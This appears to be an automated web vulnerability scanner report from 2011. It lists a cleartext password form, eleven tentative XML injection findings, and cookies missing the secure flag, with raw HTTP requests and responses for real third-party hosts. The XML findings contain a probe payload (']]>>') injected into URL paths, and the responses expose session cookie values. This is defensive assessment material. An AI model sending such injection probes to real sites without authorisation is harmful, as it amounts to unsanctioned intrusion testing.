...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8. Cleartext submission of password

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...
<div class="LoginIndex"> <form action="/login/" method="post"> <!--<p class="error">
...[SNIP]...
<dd><input name="password" type="password" id="password" value=""/></dd>
...[SNIP]...

9. XML injection
There are 11 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


9.1. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bluepixel]]>>/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:46:41 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1088

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.2. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bluepixel/cnt-gif1x1.php]]>>?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:46:56 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1088

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.3. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: A05988CEAD25925D
x-amz-id-2: KNXvDL6ALp8tjbxLMsX5oKrAVAblkIYeFBI+RsdcyloSRi17MBXClUYs1SCdEdQL
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:47:57 GMT
Server: ATS/2.1.4-unstable
Age: 0
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images]]&gt;&gt;/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key>
...[SNIP]...

9.4. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/1311756]]>>/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: CD4C25CE6283E9D1
x-amz-id-2: OsaSJ4av7UqC8NO0NRk6wbvSsGo6u6iapaL0YZjakkvS/xMV6uYplOauYQkajPEp
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:48:04 GMT
Server: ATS/2.1.4-unstable
Age: 0
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756]]&gt;&gt;/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key>
...[SNIP]...

9.5. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]>>?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 71624C2808095279
x-amz-id-2: NMg6cva34xdIFxAV460dMjtNILalvH/SqQRxmXMTJTSkE961cz+kTQyBA0dE+bhA
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:48:18 GMT
Server: ATS/2.1.4-unstable
Age: 1
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]&gt;&gt;</Key>
...[SNIP]...

9.6. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver]]>>/www/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:28 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.7. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www]]>>/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:33 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.8. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www/delivery]]>>/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:40 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.9. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www/delivery/tjs.php]]>>?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:45 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.10. http://kroogy.com/search/images/blank.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/images/blank.gif]]>> HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:46:11 GMT; path=/
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:46:11 GMT; path=/
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 43376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
search").style.border="0px";

    document.getElementById("livesearch").style.padding="0px";

return;

}

xmlhttp=GetXmlHttpObject()

if (xmlhttp==null)

{

alert ("Your browser does not support XML HTTP Request");

return;

}

document.getElementById("livesearch").style.padding="0px";

type=document.searchform.type.value;

var url="http://kroogy.com/index/livesearch";

url=url+"&q="+str;

ur
...[SNIP]...

9.11. http://www.dictof.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 24 Apr 2011 12:45:28 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: lc=en; Path=/
Content-Language: en
Content-Length: 3614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<a href="/sitemap.xml">XML Site Map</a>
...[SNIP]...

10. SSL cookie without secure flag set
There are 13 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://secure.identityguard.com/EnrollmentStep1

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:36:12 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000KToyasEeVy_fQHf6TuSK9Mc:14ej3pg70; Path=/
Set-Cookie: REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; Expires=Sun, 08 May 2011 03:35:20 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002777198=100000002777198%2cVoEQEMAaxiiOxH5%2fHe03xssaVwY%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002777198=100000002777198%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblgaG4LolUzuM7owtK6Gi%2bVaq7muVpgRvizF3GEYunmq5qAGshvG%2fXVXEJobjTsDIa%0auhm1cgxjc8Dg7Bta%2bhk6VW6qOQMB228jrA07GAd7ulM%2f%2bYbi2c00FUf8MBs4lni1kKc%2bItFLUY8t%0a%2bqcUB9ES; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


10.2. https://secure.lifelock.com/portal/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...

10.3. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
